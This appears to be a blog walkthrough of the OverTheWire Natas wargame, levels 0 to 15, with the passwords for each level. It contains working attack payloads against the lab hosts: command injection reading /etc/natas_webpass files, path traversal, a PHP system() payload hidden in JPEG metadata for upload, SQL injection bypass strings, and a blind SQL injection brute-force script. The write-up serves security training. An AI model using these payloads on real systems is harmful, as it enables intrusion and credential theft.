Solutions of NATAS 1-15

Hello Folks, In this post, I will share with you the solutions of Natas challenges from one to fifteen. It is strongly recommended not to look at the solutions without cogitating. Natas0: Username and password have been already provided for Natas0. URL: http://natas0.natas.labs.overthewire.org natas0/natas0 Solution: Login the page with the credential natas0/natas0. On Chrome Browser right-click and “View page source” Password for natas1 is : gtVrDuiDfck831PqWsLEZy5gyDz1clto Natas1: URL: http://natas1.natas.labs.overthewire.org/

Solution: Login the page with the credential that you got from the natas0. In this challenge you can not do right-clicking, instead you should use F12 shortcut function key to open Web developer tools. And the select Elements tab. Password for natas2 is : ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi   Natas2: URL: http://natas2.natas.labs.overthewire.org Solution: Login the page with the credential that you got from the natas1. On Chrome Browser right-click and “View page source” Actually it is not obvious, but we have a hint from the tag

<body>
<h1>natas2</h1>
<div id="content">
There is nothing on this page
<img src="files/pixel.png">
</div>
</body></html>

Let’s make a request for the URL http://natas2.natas.labs.overthewire.org/files/ Password for natas3 is : sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14

Natas3: URL: http://natas3.natas.labs.overthewire.org For this challenge, we should have basic understanding of robots.txt which is a Robots Exclusion Protocol, which indicates whether certain user agents (web-crawling software) can or cannot crawl parts of a website. These crawl instructions are specified by “disallowing” or “allowing” the behavior of certain (or all) user agents. For more information here .

Solution: Login the page with the credential that you got from the natas2 and “View Page Source” on Google Chrome.  

Password for natas4 is: Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ Natas4: URL: http://natas4.natas.labs.overthewire.org To solve this challenge you need to have basic understanding of  de-facto HTTP request headers. For this challenge, our solution is Referer header.

Solution: Referer is an HTTP header field  that identifies the address of the webpage (i.e. the URI  or IRI ) that linked to the resource being requested. By checking the referrer, the new webpage can see where the request originated.(Wikipedia)

curl -v -H "Referer: http://natas5.natas.labs.overthewire.org/"  -u  natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ http://natas4.natas.labs.overthewire.org

Password for natas5 is : iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

Natas5: URL: http://natas5.natas.labs.overthewire.org When we send a web request to web server via curl, Web server sends  a Set-Cookie header to the user agent. And with every request user agent will send back all previously stored cookies to the server with Cookie: header.

curl -v -u "natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" http://natas5.natas.labs.overthewire.org/
* About to connect() to natas5.natas.labs.overthewire.org port 80 (#0)
*   Trying 176.9.9.172...
* Connected to natas5.natas.labs.overthewire.org (176.9.9.172) port 80 (#0)
* Server auth using Basic with user 'natas5'
> GET / HTTP/1.1
> Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
> User-Agent: curl/7.29.0
> Host: natas5.natas.labs.overthewire.org
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Sat, 24 Nov 2018 14:09:16 GMT
< Server: Apache/2.4.10 (Debian)
< Set-Cookie: loggedin=0
< Vary: Accept-Encoding
< Content-Length: 855
< Content-Type: text/html; charset=UTF-8
< 

Solution: There is no clear answer of this challenge. I just guessed it and modify the Cookie by setting the Cookie: loggedin=1

curl -v -H "Cookie: loggedin=1" -u natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq "http://natas5.natas.labs.overthewire.org"
* About to connect() to natas5.natas.labs.overthewire.org port 80 (#0)
*   Trying 176.9.9.172...
* Connected to natas5.natas.labs.overthewire.org (176.9.9.172) port 80 (#0)
* Server auth using Basic with user 'natas5'
> GET / HTTP/1.1
> Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
> User-Agent: curl/7.29.0
> Host: natas5.natas.labs.overthewire.org
> Accept: */*
> Cookie: loggedin=1
> 
< HTTP/1.1 200 OK
< Date: Sat, 24 Nov 2018 14:11:43 GMT
< Server: Apache/2.4.10 (Debian)
< Set-Cookie: loggedin=1
< Vary: Accept-Encoding
< Content-Length: 890
< Content-Type: text/html; charset=UTF-8
< 
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas5", "pass": "iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" };</script></head>
<body>
<h1>natas5</h1>
<div id="content">
<strong>Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1</strong></div>
</body>
</html>
* Connection #0 to host natas5.natas.labs.overthewire.org left intact

Password for the natas6 is : aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Natas6: URL: http://natas6.natas.labs.overthewire.org When we check the source code. It compares the value of the $secret with the value of the input element. If both values are equal, password for natas7 will be printed.

<?

include "includes/secret.inc";

    if(array_key_exists("submit", $_POST)) {
        if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
    }
?>

Solution: The include statement includes and evaluates the specified file.(php Manual).  Let’s try to access the include/secret.inc file by making a web request. URL http://natas6.natas.labs.overthewire.org/includes/secret.inc As you see value of $secret variable is FOEIUWGHFEEUHOFUOIU. if you put this value to input form and submit the form.  

Password for natas7 is: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9 Natas7: URL: http://natas7.natas.labs.overthewire.org

Solution: Web pages are rendered by the value of $_REQUEST[‘page’]. As an example . http://natas7.natas.labs.overthewire.org/index.php?page=about (To render about page.) What if we set the page value to /etc/natas_webpass/natas8 So our URL will be http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8    

Password for natas8 is: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

Natas8: URL: http://natas8.natas.labs.overthewire.org We need to simple reverse engineering to solve this challenge. Key thing is the function encodeSecret() We must put a value into the input form that function yields us the value 3d3d516343746d4d6d6c315669563362  

Solution: You can use the URL https://repl.it/repls/SoftElegantPublishers for your php sandbox.

<?php

echo base64_decode((strrev(hex2bin("3d3d516343746d4d6d6c315669563362"))));

//oubWYf2kBq
?>

Password for natas9 is: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl Natas9: URL: http://natas9.natas.labs.overthewire.org

Solution:

Running multiple commands by separating semicolon(;).

ls;cat /etc/natas_webpass/natas10

Password for natas10 is: nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu Natas10: URL: http://natas10.natas.labs.overthewire.org

<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>
</pre>

Solution:   If you check the snipped of code above some of the special characters checked by the preg_match() php funtion. We need to bypass this check somehow. Solution1:  .* cat /etc/natas_webpass/natas11 Solution2: Using the URL Encoding code to escaping the preg_match() function. http://natas10.natas.labs.overthewire.org/index.php?needle=pass%0A%20cat%20/etc/natas_webpass/natas11&submit=Search

.htaccess:AuthType Basic
.htaccess: AuthName "Authentication required"
.htaccess: AuthUserFile /var/www/natas/natas10//.htpasswd
.htaccess: require valid-user
.htpasswd:natas10:$1$XOXwo/z0$K/6kBzbw4cQ5exEWpW5OV0
.htpasswd:natas10:$1$mRklUuvs$D4FovAtQ6y2mb5vXLAy.P/
.htpasswd:natas10:$1$SpbdWYWN$qM554rKY7WrlXF5P6ErYN/
/etc/natas_webpass/natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

Password for natas11 is: U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK Natas11: URL: http://natas11.natas.labs.overthewire.org/

<?

$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {
    $key = '<censored>';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
    $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}

function loadData($def) {
    global $_COOKIE;
    $mydata = $def;
    if(array_key_exists("data", $_COOKIE)) {
    $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
    if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {
        if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
        $mydata['showpassword'] = $tempdata['showpassword'];
        $mydata['bgcolor'] = $tempdata['bgcolor'];
        }
    }
    }
    return $mydata;
}

function saveData($d) {
    setcookie("data", base64_encode(xor_encrypt(json_encode($d))));
}

$data = loadData($defaultdata);

if(array_key_exists("bgcolor",$_REQUEST)) {
    if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {
        $data['bgcolor'] = $_REQUEST['bgcolor'];
    }
}
saveData($data);
?>

  Solution:  Logic of XOR Encryption If you check the source code and the server responses, you realize that  you know the cipher and plain text, so we can extract the xor_encryption key for this challenge. Plain Text  XOR Key = Cipher Text Cipher Text XOR Plain Text = Key

[email protected]:~$ curl -v -u natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK http://natas11.natas.labs.overthewire.org/
*   Trying 176.9.9.172...
* TCP_NODELAY set
* Connected to natas11.natas.labs.overthewire.org (176.9.9.172) port 80 (#0)
* Server auth using Basic with user 'natas11'
> GET / HTTP/1.1
> Host: natas11.natas.labs.overthewire.org
> Authorization: Basic bmF0YXMxMTpVODJxNVRDTU1ROXh1Rm9JM2RZWDYxczdPWkQ5SktvSw==
> User-Agent: curl/7.58.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Tue, 27 Nov 2018 17:41:41 GMT
< Server: Apache/2.4.10 (Debian)
< Set-Cookie: data=ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw%3D
< Vary: Accept-Encoding
< Content-Length: 1085
< Content-Type: text/html; charset=UTF-8

cipher is: ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw

<?php
$data=array( "showpassword"=>"no", "bgcolor"=>"#ffffff");
echo (json_encode($data));
?>

Result:

{"showpassword":"no","bgcolor":"#ffffff"}

Let’s use  {“showpassword”:“no”,“bgcolor”:"#ffffff"} as our key.  

Key is: qw8J  

Encrypted cookie for showing password is: ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK

curl -u natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK --cookie "data=ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK" http://natas11.natas.labs.overthewire.org

  Password for natas12 is: EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3

Natas12: URL: http://natas12.natas.labs.overthewire.org/

1- Install exiftool. 2- Create a very small jpg image which is less than 1KiB and name it white.jpg (small white background is enough) 3- Next step is injecting malicious php code inside the white.jpg by using exiftool.

exiftool -documentname="<?php system('cat /etc/natas_webpass/natas13'); ?>" white.jpg

[email protected]:~/Downloads$ exiftool white.jpg
ExifTool Version Number         : 10.80
File Name                       : white.jpg
Directory                       : .
File Size                       : 917 bytes
File Modification Date/Time     : 2018:11:27 22:11:00+04:00
File Access Date/Time           : 2018:11:27 22:11:00+04:00
File Inode Change Date/Time     : 2018:11:27 22:11:00+04:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Exif Byte Order                 : Big-endian (Motorola, MM)
Document Name                   : <?php system('cat /etc/natas\_webpass/natas13'); ?>
X Resolution                    : 1
Y Resolution                    : 1
Resolution Unit                 : None
Y Cb Cr Positioning             : Centered
Image Width                     : 51
Image Height                    : 51
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 51x51
Megapixels                      : 0.003

4- Open the browser and make web request to http://natas12.natas.labs.overthewire.org/ 5- Open browser’s “Developer tools.” and the remove the type=“hidden” tag 6- And modify the suffix from jpg to php. 7- Click the link of the uploaded file. it will be interpret by the php.  

Password for natas13 is: jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY Natas13: URL: http://natas13.natas.labs.overthewire.org You can use the same method as we did on natas12. Only thing you have to do is changing the file.

exiftool -documentname="<?php system('cat /etc/natas\_webpass/natas14'); ?>" white.jpg

Password for natas14 is: Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1

Natas14: URL: http://natas14.natas.labs.overthewire.org  

if(array_key_exists("username", $_REQUEST)) { 
    $link = mysql_connect('localhost', 'natas14', '<censored>'); 
    mysql_select_db('natas14', $link); 
     
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\""; 
    if(array_key_exists("debug", $_GET)) { 
        echo "Executing query: $query<br>"; 
    } 

    if(mysql_num_rows(mysql_query($query, $link)) > 0) { 
            echo "Successful login! The password for natas15 is <censored><br>"; 
    } else { 
            echo "Access denied!<br>"; 
    } 
    mysql_close($link); 
} else { 
?>

Solution: username > " or “1”=“1 password > " or “1”=“1  

Password for natas15 is: AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J Natas15:

<? 

/* 
CREATE TABLE `users` ( 
  `username` varchar(64) DEFAULT NULL, 
  `password` varchar(64) DEFAULT NULL 
); 
*/ 

if(array_key_exists("username", $_REQUEST)) { 
    $link = mysql_connect('localhost', 'natas15', '<censored>'); 
    mysql_select_db('natas15', $link); 
     
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\""; 
    if(array_key_exists("debug", $_GET)) { 
        echo "Executing query: $query<br>"; 
    } 

    $res = mysql_query($query, $link); 
    if($res) { 
    if(mysql_num_rows($res) > 0) { 
        echo "This user exists.<br>"; 
    } else { 
        echo "This user doesn't exist.<br>"; 
    } 
    } else { 
        echo "Error in query.<br>"; 
    } 

    mysql_close($link); 
} else { 
?> 

//omitted...

Solution: My first guess to solve this challenge was the into outfile statement. Unluckily, I do not have permission to create a file. For more information check secure_file_priv option of mysql server.

Example: select * from users where username=“natas16” into outfile “/var/www/html” After three days of trying other methods. I stuck on this challenge. So, I had to get some hint. Hint was the “Blind Sql Injection”. After red over some pages in the blogs, I understand the logic and create my own solution to find the password. Basically script does brute-force by trying all the alphabets(uppercase, lowercase) and numbers.  

#!/bin/bash

letters=""
for i in {a..z}
do
	letters+=$i
done

for i in {A..Z}
do
	letters+=$i
done

for i in {0..9}
do
	letters+=$i
done
#################################################################
echo $letters
echo ""
echo ""

key=""


for count in {1..40}
do
for (( i=0; i<${#letters}; i++ )); do
  letter="${letters:$i:1}"
	curl -u natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J "http://natas15.natas.labs.overthewire.org/index.php?debug&username=natas16%22%20%20and%20password%20like%20binary%20%22$key$letter%" | grep -i "This user exist."
	if [ $? -eq 0 ] ; then
		key+=$letter
	fi
done
done
echo "key is: $key"

Password for natas16 is: WaIHEacj63wnNIBROHeqi3p9t0m5nhmh